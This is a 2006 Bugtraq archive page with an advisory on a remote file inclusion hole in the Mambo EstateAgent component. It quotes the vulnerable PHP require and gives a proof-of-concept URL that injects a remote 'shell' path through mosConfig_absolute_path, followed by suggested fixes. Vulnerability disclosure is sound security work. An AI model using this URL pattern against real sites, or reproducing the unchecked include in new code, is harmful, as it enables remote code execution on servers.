Bugtraq mailing list archives
Mambo Component - EstateAgent Remote File Inclusion
From: Outlaw () aria-security net
Date: 20 Aug 2006 02:02:16 -0000
########################################################################################### # Aria-Security.net Advisory # # Discovered by: O.U.T.L.A.W # # < www.Aria-security.net > # # Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp # # # ########################################################################################### #Software: Mambo Component - EstateAgent #Attack method: #Source: # # Don't allow direct linking defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); require_once( $mainframe->getPath( 'front_html' ) ); require($mosConfig_absolute_path."/administrator/components/com_estateagent/configuration.php"); ************************************************************************************ #Proof of Concept: # #www.site.com/com_estateagent/estateagent.php?mosConfig_absolute_path=shell # #---------------------------------------------------------- # #Solutions : #1 - If you have access on webserver turn register_globals in php.ini off #2 - You must give a value before put the value of variable in the include function or check and filter #unnormal entrance out . # # #Contact : Outlaw () aria-security net
Current thread:
- Mambo Component - EstateAgent Remote File Inclusion Outlaw (Aug 21)
- Re: Mambo Component - EstateAgent Remote File Inclusion Carsten Eilers (Aug 24)